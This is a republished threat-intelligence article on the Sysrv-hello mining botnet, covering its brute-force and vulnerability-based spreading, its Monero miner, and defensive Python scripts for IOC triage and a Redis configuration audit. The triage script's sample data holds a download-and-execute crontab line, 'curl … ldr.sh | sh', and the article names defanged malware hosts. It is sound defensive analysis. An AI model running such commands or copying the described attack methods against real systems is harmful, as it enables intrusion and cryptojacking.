Source: SLTechnology News&Howtos, Shulou (Shulou.com), report dated 06/03, updated 2025-01-19
This article describes the new attack capabilities of the latest version of the Sysrv-hello botnet. The analysis is concise and practical; the following sections walk through what has changed in this version.
I. Overview
Tencent Security Threat Intelligence Center has detected that the Sysrv-hello botnet has been very active recently. It combines the capabilities of a Trojan, a backdoor and a worm in one piece of malware.
The Sysrv-hello botnet was first disclosed in December 2020. In January this year Tencent Security found the group using the Weblogic remote code execution vulnerability (CVE-2020-14882) to spread, and this month the group upgraded its attack methods again: five new attack capabilities have been added, and the number of compromised hosts is observed to be rising. Its intrusion methods target Web services commonly used by most government and enterprise organizations, so the potential harm is serious. Tencent security experts remind security operations staff of the relevant organizations to be highly vigilant.
The Sysrv-hello botnet targets both Linux and Windows operating systems and ultimately uses compromised hosts for cryptocurrency mining, which consumes a large share of host CPU resources and seriously degrades the host's normal services. The botnet also uses compromised hosts to keep scanning and attacking other targets. The full range of Tencent Security products supports detection and defense against every stage of the Sysrv-hello botnet's attack and propagation activity.
Investigation and reinforcement
Tencent security experts recommend that security operators check the following items to determine whether a system has been compromised.
Files:
/tmp/sysrv*
/tmp/<random directory>/kthreaddi
Processes:
sysrv*
kthreaddi
Scheduled tasks:
A suspicious crontab entry that downloads and executes a script (hxxp://xx.xx.x.x/ldr.sh)
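The three checks above (files, processes, crontab) as a small triage script. This is an added example, not code from the original article or from Tencent; the sample paths, process names and crontab lines are constructed stand-ins for the output of `find /tmp`, `ps -eo comm` and `crontab -l`.

```python
import re

# Indicators named in the article: /tmp/sysrv*, /tmp/<random dir>/kthreaddi,
# processes sysrv* / kthreaddi, and a crontab entry that pulls ldr.sh.
FILE_PATTERNS = [
    re.compile(r"^/tmp/sysrv[^/]*$"),
    re.compile(r"^/tmp/[^/]+/kthreaddi$"),
]
# Exact match on kthreaddi so the legitimate kernel thread "kthreadd" is not flagged.
PROCESS_PATTERNS = [re.compile(r"^sysrv"), re.compile(r"^kthreaddi$")]
CRON_PATTERN = re.compile(r"(https?|hxxp)://\S+/ldr\.sh", re.IGNORECASE)


def check_files(paths):
    """Return the paths that match the on-disk indicators."""
    return [p for p in paths if any(r.match(p) for r in FILE_PATTERNS)]


def check_processes(names):
    """Return the process names (as printed by `ps -eo comm`) that match."""
    return [n for n in names if any(r.match(n) for r in PROCESS_PATTERNS)]


def check_crontab(text):
    """Return crontab lines that download and run ldr.sh."""
    return [line for line in text.splitlines() if CRON_PATTERN.search(line)]


def triage(paths, process_names, crontab_text):
    """Run all three checks; empty lists mean no indicator was found."""
    return {
        "files": check_files(paths),
        "processes": check_processes(process_names),
        "crontab": check_crontab(crontab_text),
    }


if __name__ == "__main__":
    # Constructed sample data, not collected from a real host.
    sample_paths = ["/tmp/sysrv003", "/tmp/Xk3f9/kthreaddi", "/tmp/systemd-private-1"]
    sample_procs = ["bash", "kthreaddi", "sysrv003", "kthreadd"]
    sample_cron = "* * * * * curl -fsSL hxxp://xx.xx.x.x/ldr.sh | sh\n0 3 * * * /usr/bin/logrotate\n"
    for category, hits in triage(sample_paths, sample_procs, sample_cron).items():
        print(f"{category}: {hits or 'clean'}")
```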
The following hardening measures are recommended to eliminate the risk:
Configure strong passwords for Jupyter, WordPress, Jenkins, Redis and similar service components.
Do not expose the Redis port to the public network unless necessary; where it must be exposed, configure an appropriate access control policy.
Upgrade Apache Solr to the latest version to remove the vulnerability.
II. Sample analysis
Analysis of the samples shows that the code structure of the current Sysrv-hello Trojan differs substantially from earlier versions. At the behavior level the sample adds port-based anti-debugging and updated infrastructure, and it gains five new intrusion methods. In addition to the existing MySQL brute-forcing, Tomcat brute-forcing, Weblogic vulnerability exploitation and Nexus weak-password command-execution exploitation, attacks against the following five components have been added:
1. Jupyter weak password brute-force intrusion
2. WordPress weak password brute-force intrusion
3. Jenkins weak password brute-force intrusion
4. Redis unauthorized access with scheduled task write intrusion
5. Apache Solr command execution vulnerability exploit (CVE-2019-0193)
The hello_src_exp combined attack from the previous version is retained:
After a successful intrusion, a shell script is implanted to execute malicious commands, and the script then pulls the sysrv worm propagation module. During analysis two malicious file hosting addresses were captured, hxxp://finalshell.nl and hxxp://45.145.185.85, with the corresponding sysrv worm modules named sysrv002 and sysrv003 respectively, which shows that the worm is updated frequently.
Once the analyzed version of the sysrv worm starts, it scans at random: it generates random IP addresses, selects one of 9 prepared target ports for each probe, checks whether the service is open and then chooses the attack mode. A single scan cycle lasts 5 minutes.
The scanned ports are shown below (figure).
After patching out the sysrv worm's random target scanning code, its single attack flow is easier to observe.
Compared with the previous version, the new version adds 5 component attack methods, described in the following sections:
Jupyter weak password brute-force intrusion
Jupyter Notebook is an interactive notebook that supports running more than 40 programming languages. It is essentially a Web application for creating and sharing literate programming documents, supporting live code, mathematical equations and visualizations. An unauthorized access vulnerability arises when an administrator does not configure a password for Jupyter Notebook, or configures a weak one. An attacker can then log in to its administrative interface and create a console to execute arbitrary code.
Figure: Jupyter Notebook login and management interface
Figure: clicking "terminal" creates a console that can execute arbitrary code
The sysrv infection process detects the target's Jupyter login page.
It queries the login interface and tries to log in to the Jupyter management backend with a weak password list.
Figure: some of the weak passwords used during the attack
After a successful login, it calls the management panel's terminals API to execute commands, which compromises the server by running malicious scripts.
The following picture shows the sysrv003 worm module being implanted after the Jupyter component was successfully compromised.
Apache Solr command execution vulnerability intrusion (CVE-2019-0193)
Apache Solr is an open source search server written in Java and based mainly on HTTP and Apache Lucene. On August 1, 2019, Apache Solr officially issued a warning for CVE-2019-0193 with a severity rating of serious. The virus uses this vulnerability to compromise the server and implant malicious scripts that execute malicious code.
WordPress weak password brute-force intrusion
WordPress is an open source software system for quickly building websites, blogs or applications. When the WordPress administrator's password is too simple, attackers can brute-force it, log in to the system and compromise the host further. The attacker brute-forces the xmlrpc.php interface, bypasses WordPress security restrictions, and finally implants malicious code by modifying the theme or uploading plug-ins.
Jenkins weak password brute-force intrusion
The Jenkins panel offers a script execution interface through which users can run system commands; attackers reach that interface through an unauthorized access vulnerability or by brute-forcing user passwords and thereby gain server privileges.
Figure: some of the weak passwords used during the attack
Redis unauthorized access with scheduled task write intrusion
By default, Redis binds its service to 0.0.0.0:6379, which exposes it to the public network. If authentication is not enabled, any user can access the Redis server without authorization and perform read and write operations. The virus exploits this to write a scheduled task and compromise the host further.
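A configuration audit for the Redis exposure just described and for the hardening recommended earlier (restricted bind address, access control, strong password). This is an added example, not code from the original article or from the Redis project; both redis.conf fragments are constructed and the password value is a placeholder.

```python
# Bind tokens that make the listener reachable from every interface.
WEAK_BINDS = {"0.0.0.0", "*", "::", "-::*"}

# Constructed: roughly what a default, public-facing instance looks like.
EXPOSED_CONF = """bind 0.0.0.0
port 6379
protected-mode no
"""

# Constructed: the reinforcement the article recommends.
HARDENED_CONF = """bind 127.0.0.1 -::1
port 6379
protected-mode yes
requirepass REPLACE_WITH_STRONG_PASSWORD
rename-command CONFIG ""
"""


def parse_redis_conf(text):
    """Return {directive: [values...]} for the active (non-comment) lines."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means the checked settings are safe."""
    conf = parse_redis_conf(text)
    findings = []
    addrs = [a for line in conf.get("bind", []) for a in line.split()]
    if not addrs or any(a in WEAK_BINDS for a in addrs):
        findings.append("bind: listener reachable on all interfaces (no bind or 0.0.0.0)")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode: disabled")
    if not any(v for v in conf.get("requirepass", [])):
        findings.append("requirepass: no password set, unauthenticated access possible")
    if not any(v.upper().startswith("CONFIG ") for v in conf.get("rename-command", [])):
        findings.append("rename-command: CONFIG not renamed or disabled")
    return findings


if __name__ == "__main__":
    for name, text in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or "no findings")
```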
kthreaddi mining
The final payload delivered by the virus is still a mining Trojan, and the sysrv module protects the mining process through its Guard daemon. When no kthreaddi process exists, it releases the miner into a random directory under /tmp, runs it, and then deletes the local miner file.
Figure: the miner is released into a random folder under /tmp, named kthreaddi, and the file is then deleted
The miner consumes a large share of machine resources; it is still an XMR-type miner and mines Monero.
III. Attack behavior from the ATT&CK perspective
ATT&CK stage: Behavior
Reconnaissance: Randomly generate IP addresses and scan their ports to confirm the presence of Web services such as Jupyter, WordPress and Jenkins.
Resource development: Register C2 servers and plant worm modules on compromised servers to spread further.
Initial access: Implant a malicious payload that executes malicious commands and compromises the system through externally exposed Web services.
Execution: First implant malicious scripts to execute malicious commands, then download and implant the ELF worm and mining modules.
Persistence: Use scheduled tasks to maintain persistence.
Defense evasion: The mining process is named kthreaddi, which closely resembles a system process name in order to blend in.
Discovery: Scan target Web service information to decide on follow-up attacks.
Impact: The sysrv worm module scans continuously and the Monero miner runs without interruption, which drives the system CPU load too high, consumes a large amount of host CPU resources, seriously degrades the host's normal services and risks a system crash.